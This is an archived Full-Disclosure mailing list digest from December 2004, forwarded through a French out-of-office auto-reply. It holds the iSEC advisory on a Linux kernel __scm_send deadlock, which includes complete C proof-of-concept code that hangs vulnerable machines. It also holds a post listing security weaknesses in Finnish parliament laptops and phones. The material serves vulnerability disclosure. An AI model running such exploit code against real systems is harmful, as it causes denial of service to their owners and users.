Full Disclosure mailing list archives
[Full-Disclosure] Objet :Full-disclosure Digest, Vol 1, Issue 2116 (De retour le mardi 28 décembre.)
From: "Christophe Savin" <christophe.savin () tdf fr>
Date: Wed, 22 Dec 2004 05:27:05 +0100
En mon absence, toute demande concernant les réseaux doit être envoyée au mail : ars_reseaux () tdf fr ou (ars_transpac pour tout incident lié à ce réseau) En cas d'urgence, Vous pouvez contacter : La Hot-line Réseaux : 01 49 15 32 53 François LEVEQUE au 01 49 15 30 56 Pascal PAINPARAY au 01 49 15 31 36. Bonnes fêtes de fin d'année. Christophe SAVIN
full-disclosure 12/19/04 18:00 >>>
Send Full-Disclosure mailing list submissions to full-disclosure () lists netsys com To subscribe or unsubscribe via the World Wide Web, visit https://lists.netsys.com/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists netsys com You can reach the person managing the list at full-disclosure-owner () lists netsys com When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Today's Topics: 1. Re: HyperTerminal - Buffer Overflow In .ht File (Gregory Gilliss) 2. [VulnDiscuss] Re: Linux kernel scm_send local DoS (even multiplexed) 3. E-mail tracking finds murderess and baby in kidnap-homicide case. (Tamas Feher) 4. Re: Security breach database (Willem Koenings) 5. Insecurity in Finnish parlament (computers) (Markus Jansson) ---------------------------------------------------------------------- Message: 1 Date: Fri, 17 Dec 2004 10:38:23 -0800 From: Gregory Gilliss <ggilliss () netpublishing com> Subject: Re: [Full-disclosure] HyperTerminal - Buffer Overflow In .ht File To: full-disclosure () lists netsys com Message-ID: <20041217183823.GA20342 () netpublishing com> Content-Type: text/plain; charset=us-ascii great, so while I'm using hyperterminal on my network connected machine (!) to update my hardware for the latest exploit, along comes someone with this and hacks my client laptop. Somehow I'm glad that I only use UNIX... -- Greg On or about 2004.12.15 11:59:56 +0000, Brett Moore (brett.moore () security-assessment com) said:
======================================================================== = HyperTerminal - Buffer Overflow In .ht File = = MS Bulletin posted: = http://www.microsoft.com/technet/security/bulletin/MS04-043.mspx = = Affected Software: = Microsoft Windows NT Server 4.0 SP 6a = Microsoft Windows NT Server 4.0 Terminal Server Edition SP6 = Microsoft Windows 2000 SP4 = Microsoft Windows XP SP2 = Microsoft Windows XP 64-Bit Edition SP1 = Microsoft Windows XP 64-Bit Edition Version 2003 = Microsoft Windows Server 2003 = Microsoft Windows Server 2003 64-Bit Edition = = Public disclosure on December 15, 2004 ========================================================================
<<SNIP>> -- Gregory A. Gilliss, CISSP E-mail: greg () gilliss com Computer Security WWW: http://www.gilliss.com/greg/ PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3 ------------------------------ Message: 2 Date: Wed, 15 Dec 2004 04:23:22 +0100 From: even multiplexed <Shadow333 () gmx at> Subject: [Full-disclosure] [VulnDiscuss] Re: Linux kernel scm_send local DoS To: security () isec pl Cc: vulnwatch () vulnwatch org, bugtraq () securityfocus com, full-disclosure () lists netsys com Message-ID: <41BFAE2A.7040002 () gmx at> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Paul Starzetz wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Synopsis: Linux kernel scm_send local DoS Product: Linux kernel Version: 2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9 Vendor: http://www.kernel.org/ URL: http://isec.pl/vulnerabilities/isec-0019-scm.txt CVE: CAN-2004-1016 Author: Paul Starzetz <ihaquer () isec pl> Date: Dec 14, 2004 Issue: ====== A locally exploitable flaw has been found in the Linux socket layer, that allows a local user to hang a vulnerable machine. Details: ======== The Linux kernel provides a powerful socket API to user applications. Among other functions sockets provide an universal way for IPC and user- kernel communication. The socket layer uses several logical sublayers. One of the layers, so called auxiliary message layer (or scm layer), augments the socket API by an universal user-kernel message passing capability (see recvfrom(2) for more details on auxiliary messages). One of the scm message parsing functions invoked from the kernel sendmsg() code is __scm_send() and suffers from a deadlock condition if carefully prepared auxiliary message(s) is sent to a socket by an unprivileged application. We believe that the 2.4 kernel branch is not further exploitable. The 2.6 branch has not been extensively checked, however it may be locally exploitable to gain elevated privileges due to its increased complexity. Discussion: ============= See attached code. Impact: ======= Unprivileged local users may hang a vulnerable Linux machine. Credits: ======== Paul Starzetz <ihaquer () isec pl> has identified the vulnerability and performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS. Disclaimer: =========== This document and all the information it contains are provided "as is", for educational purposes only, without warranty of any kind, whether express or implied. The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liability claims regarding damage caused by the use of any information provided, including any kind of information which is incomplete or incorrect, will therefore be rejected. Appendix: ========= /* * Linux kernel 2.4 & 2.6 __scm_send DoS * Warning! this code will hang your machine * * gcc -O2 scmbang.c -o scmbang * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #define _GNU_SOURCE #include <stdio.h> #include <errno.h> #include <sys/socket.h> #include <arpa/inet.h> static char buf[1024]; void fatal (const char *msg) { printf ("\n"); if (!errno) { fprintf (stderr, "FATAL: %s\n", msg); } else { perror (msg); } printf ("\n"); fflush (stdout); fflush (stderr); exit (1); } int main (void) { int s[2], r; struct sockaddr_in sin; struct msghdr *msg; struct cmsghdr *cmsg; r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s); if (r < 0) fatal ("socketpair"); memset (buf, 0, sizeof (buf)); msg = (void *) buf; msg->msg_control = (void *) (msg + 1); // make bad cmsgs cmsg = (void *) msg->msg_control; cmsg->cmsg_len = sizeof (*cmsg); cmsg->cmsg_level = 0xdeadbebe; cmsg->cmsg_type = 12; // len after overflow on second msg cmsg++; // -12 for deadlock cmsg->cmsg_len = -12; cmsg->cmsg_level = SOL_IP; msg->msg_controllen = (unsigned) (cmsg + 1) - (unsigned) msg->msg_control; r = sendmsg (s[0], msg, 0); if (r < 0) fatal ("sendmsg"); printf ("\nYou lucky\n"); fflush (stdout); return 0; } - -- Paul Starzetz iSEC Security Research http://isec.pl/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFBvsFeC+8U3Z5wpu4RAkcYAJ9ZANZb3Yt8LHIZHu4YTiKN+Htt3QCfZ0rH ZB8QMKmLVyKaQ5fvN/l8mL8= =2hQr -----END PGP SIGNATURE-----
Dear Ladies and Gentleman First of all thanks to mir Starzetz for bringing this bug to our attention.i just wanted to ask if anyone has a tip for me how to quickfix this bug, without actually rebuilding a patched version of the kernel. id be thankful for every tip. i hope theres actually a way to do that, cause our customers wouldnt like that system of ours to reboot:/ greets Oliver Leitner ------------------------------ Message: 3 Date: Sat, 18 Dec 2004 21:13:24 +0100 From: "Tamas Feher" <etomcat () freemail hu> Subject: [Full-disclosure] E-mail tracking finds murderess and baby in kidnap-homicide case. To: full-disclosure () lists netsys com Message-ID: <41C49D74.29818.C2BE56@localhost> Content-Type: text/plain; charset=US-ASCII Not for the faint of heart. "http://www.cnn.com/2004/US/12/18/fetus.found.ali ve/index.html" BTW I love capital punishment! Regards: Tamas Feher. ------------------------------ Message: 4 Date: Sun, 19 Dec 2004 00:04:06 +0200 From: Willem Koenings <infsec () gmail com> Subject: Re: [Full-disclosure] Security breach database To: full-disclosure () lists netsys com Message-ID: <9b13f6c1041218140468012145 () mail gmail com> Content-Type: text/plain; charset=US-ASCII
Looking for few interesting security breach stories...
Something to learn from :) http://www.dataloss.net/papers/how.defaced.apache.org.txt W. ------------------------------ Message: 5 Date: Sun, 19 Dec 2004 03:19:38 +0200 From: Markus Jansson <markus.jansson () hushmail com> Subject: [Full-disclosure] Insecurity in Finnish parlament (computers) To: full-disclosure () lists netsys com Message-ID: <41C4D72A.2010501 () hushmail com> Content-Type: text/plain; charset=ISO-8859-15; format=flowed Short version: ------------- http://www.markusjansson.net/erecent.html#comments "The laptop computers used by members of parlament and their assistants in here Finland have severe security holes. These laptop computers dont have firewalls, file encryption and wiping tools, automatic update is not turned on, operating system (WindowsXP) is on its default settings for most, computers only support 802.11b WLAN which is insecure, etc. etc. As a bonus, they use TeliaSonera GSM:s which are totally insecure because they use COMP-128-1 and A5/1 for security. I contacted them months ago but they havent bothered to answer me, nor to reporters I have contacted later. Oh dear..." Long version: ------------- 1. The computers do not have firewall, not even ICF enabled. Users cannot even enable it themselfes, since they dont have administrative permissions on the computers. Any remote-exploit vulnerability or bad passphrase and BUM! The computers is hacked. 2. The computers are mainly on default settings. They are WindowsXP. Do I really need to say more about this issue and what happens from it? 3. The computers have support for Bluetooth and it is enabled by default. This leaves many attack vectors inplace that are pretty numerous for me to tell you. Also, they have firewire enabled, which means that as in iPod:s case, anyone with such device can walk to one of these laptops and download everything inside it. Ouch. 4. Laptops have WLAN, but it only supports the totally insecure 802.11b standard. 5. Computers do not have any kind of encryption programs. All files and folders are unencrypted. Even the EFS is turned off. There is no way to secure personal or sensitive documents in the computer. 6. There are no wiping tools in the computers to wipe off sensitive or personal files from them. 7. Computers do not have "Clear pagefile on shutdown" enabled, meaning that sensitive data can be recovered from unwashed swapfile later on. 8. Users do not have administrator permissions on computer so they could install neccessary security programs to them. Ofcourse, there is the plus side that this *should* limit the damage to the systems to...well..the user (= the member of parlament or their assistants). Ouch. 9. There are VPN connections in the computers, but it is unclear are they protected against man-in-the-middle-attacks or not. My educated guess is that they arent, meaning again... 10. Its unclear are the computers set on "automatic updates" or not. My educated guess is that they arent, meaning again (especially if you look at the point 1 again)...ouch. 11. Default browser is Internet Explorer, with default settings ofcourse. Now, I dont have to tell you how serious security risk this is, especially if you concider point 10... 12. MEP:s etc. use TeliaSonera GSM:s. The security that TeliaSonera uses is COMP-128-1 and A5/1, which are all totally insecure and can easily be broken with a laptop computer etc. meaning that their conversations can easily be eavesdropped. They should use COMP-128-3 and A5/3 to make it secure... 13. At TeliaSonera GSM networks, there is no protection against "false-basestation" techique, which easy bypass of crypto by simply turning it off from the "basestation". For example, Elisa uses COMP-128-3 and A5/3 and does not allow phones to turn off crypto even basestation orders them to do so. I have contacted about this issue months ago to security personel in our parlament. They havent even bothered to answer me, not to mention that they would have fixed the computers security problems. So, here is it, maybe they'll listen now. -- My computer security & privacy related homepage http://www.markusjansson.net Use HushTools or GnuPG/PGP to encrypt any email before sending it to me to protect our privacy. ------------------------------ _______________________________________________ Full-Disclosure mailing list Full-Disclosure () lists netsys com https://lists.netsys.com/mailman/listinfo/full-disclosure End of Full-Disclosure Digest, Vol 1, Issue 2116 ************************************************ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [Full-Disclosure] Objet :Full-disclosure Digest, Vol 1, Issue 2116 (De retour le mardi 28 décembre.) Christophe Savin (Dec 22)